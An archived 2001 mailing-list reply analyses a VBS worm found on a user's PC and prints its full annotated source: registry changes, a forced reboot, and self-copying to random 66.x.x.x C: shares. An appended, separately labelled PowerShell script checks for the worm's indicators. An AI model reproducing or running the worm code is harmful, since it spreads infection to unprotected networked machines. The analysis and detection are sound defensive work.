[RC5] What is this?

Peter Corbett peter_corbett_0 at yahoo.com
Tue Sep 4 16:10:54 EDT 2001


Hi.

--- "Aaron W. Swenson" <aswenson at frontiernet.net> wrote:
> I just recently discovered this program in my start menu, not as a 
> shortcut, but the whole thing.  I don't know what it is.  And I can't find 
> where to send it to Microsoft without being CHARGED!  Any help on explaining 
> what the purpose of this script is would be wonderful considering that I 
> haven't installed anything in months.

The bad news is that it's a worm.
The good news is that it limits itself to the 66.0.0.0/8 netblock, and it
relies on the target machine having an open read/write C: drive.

Furthermore, it doesn't look like it does anything blatantly destructive, as
much as any program of unknown origin that alters your files can be
non-destructive... It removes some other VBS worms, and plugs the vulnerability
of open C: shares. However, despite its good intentions, it's still a worm, and
worms are bad.

Here's what it's doing... my notes are with the //

Dim rr
set t=wscript.createobject("wscript.network")
set f=createobject("scripting.filesystemobject")
Set WshShell = WScript.CreateObject("WScript.Shell")
randomize
on error resume next
rr=WshShell.RegRead ("HKLM\Software\Microsoft\Windows\slim")
if (rr <> 1) then
Set WshShell = WScript.CreateObject("WScript.Shell")
// This is where it sets up the objects it needs to do its dirty work.

f.copyfile "c:\sys32.exe", "c:\windows\startm~1\programs\startup\"
//Here it copies a support file to the startup dir.

Call WshShell.RegWrite
("HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Network\",
0,"REG_SZ")
Call WshShell.RegWrite
("HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoFileSharing
1 ,"REG_DWORD")
Call WshShell.RegWrite

("HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoPrintSharing",
1 ,"REG_DWORD")
Call WshShell.RegWrite ("HKLM\Software\Microsoft\Windows\slim", 1 ,"REG_SZ")
Call WSHShell.Run ("%windir%\RUNDLL32.EXE shell32.dll,SHExitWindowsEx 2", 2,
false)
end if

// Here it writes to the registry.. it looks like it's disabling file
// sharing: plugging the hole it used to get in.

do
do while w=0
if (f.fileexists("c:\network.vbs")) then f.deletefile("c:\network.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\network.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\network.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\network.exe")) then
f.deletefile("c:\windows\startm~1\programs\startup\network.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\mscfg.exe")) then
f.deletefile("c:\windows\startm~1\programs\startup\mscfg.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\mscfg.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\mscfg.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\a.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\a.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\a24.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\a24.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\little.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\little.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\prince.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\prince.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\MS StartUp
Config.exe")) then f.deletefile("c:\windows\startm~1\programs\startup\MS
StartUp Config.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\_a.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\_a.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\_b.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\_b.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\_1.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\_1.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\_chubby.vbs")) then
f.deletefile("c:\windows\startm~1\programs\startup\_chubby.vbs")

// Here it's deleting a bunch of other viruses and stuff.
 
n="\\66."&int(254*rnd+1)&"."&int(254*rnd+1)&"."&int(254*rnd+1)&"\C"
t.mapnetworkdrive "x:",n
set o=t.enumnetworkdrives
for i=0 to o.Count-1
if n=o.item(i) then w=1
next
loop
f.copyfile "c:\windows\startm~1\programs\startup\_slim.vbs",
"x:\windows\startm~1\programs\startup\"
f.copyfile "c:\sys32.exe", "x:\"
t.removenetworkdrive "x:"
w=0
loop

// Now the worm part: concoct a UNC path \\66.random.random.random\C, and map
// X: to that. Then the script copies itself to the startup folder on X:, and
// unmaps X:

Peter Corbett
peter_corbett_0 at yahoo.com
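An added example, not part of the original post: a read-only PowerShell audit that checks a host for the indicators Peter's walkthrough names (the "slim" registry marker, the NoFileSharing/NoPrintSharing policy values the worm writes, the dropped c:\sys32.exe and _slim.vbs files, and a drive letter mapped to \\66.x.x.x\C). The registry paths and file names come from the listing above; the modern per-user and all-users startup folder lookups are an assumption so that the check also runs on a current Windows host, where the literal Windows 9x path will not exist.

```powershell
# Added example (not from the original post): report-only check for the
# indicators listed in the worm walkthrough. Nothing is deleted or changed;
# review the findings and clean up by hand.

function Test-SlimWormIndicators {
    [CmdletBinding()]
    param()

    $findings = @()

    # 1. The infection marker the script writes before anything else
    #    (HKLM\Software\Microsoft\Windows\slim = "1", written as REG_SZ).
    $marker = Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows' `
                               -Name 'slim' -ErrorAction SilentlyContinue
    if ($null -ne $marker -and "$($marker.slim)" -eq '1') {
        $findings += 'Registry marker HKLM\Software\Microsoft\Windows\slim = 1'
    }

    # 2. Policy values the worm sets to turn off file and print sharing.
    #    A value of 1 here may also be your own policy, so treat it as a hint.
    $polPath = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Network'
    $pol = Get-ItemProperty -Path $polPath -ErrorAction SilentlyContinue
    foreach ($name in 'NoFileSharing', 'NoPrintSharing') {
        if ($null -ne $pol -and $null -ne $pol.PSObject.Properties[$name] -and $pol.$name -eq 1) {
            $findings += "Policy $name = 1 under Policies\Network (set by the worm; confirm it is not yours)"
        }
    }

    # 3. Dropped files: the support binary at C:\ and the script copy in startup.
    $startupDirs = @(
        'C:\windows\startm~1\programs\startup',        # literal Windows 9x path from the listing
        [Environment]::GetFolderPath('Startup'),       # assumption: current per-user startup folder
        [Environment]::GetFolderPath('CommonStartup')  # assumption: all-users startup folder
    ) | Where-Object { $_ } | Select-Object -Unique

    if (Test-Path -LiteralPath 'C:\sys32.exe') {
        $findings += 'File C:\sys32.exe present'
    }
    foreach ($dir in $startupDirs) {
        foreach ($file in '_slim.vbs', 'sys32.exe') {
            $candidate = Join-Path -Path $dir -ChildPath $file
            if (Test-Path -LiteralPath $candidate) {
                $findings += "File $candidate present"
            }
        }
    }

    # 4. The propagation channel: a drive letter mapped to \\66.a.b.c\C.
    Get-CimInstance -ClassName Win32_NetworkConnection -ErrorAction SilentlyContinue |
        Where-Object { $_.RemoteName -match '^\\\\66\.\d{1,3}\.\d{1,3}\.\d{1,3}\\C$' } |
        ForEach-Object { $findings += "Mapped drive $($_.LocalName) -> $($_.RemoteName)" }

    return $findings
}

$hits = Test-SlimWormIndicators
if ($hits.Count -eq 0) { 'No indicators from the walkthrough found.' } else { $hits }
```

Run it from an elevated prompt so the HKLM reads succeed. The finding that matters most for prevention is the one the post itself points at: the worm only gets in through a C: drive shared read/write with no password, so after cleaning up, the lasting fix is to stop exposing the root of the system drive on the network at all rather than to rely on the NoFileSharing policy the worm happened to set.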

--
To unsubscribe, send 'unsubscribe rc5' to majordomo at lists.distributed.net
rc5-digest subscribers replace rc5 with rc5-digest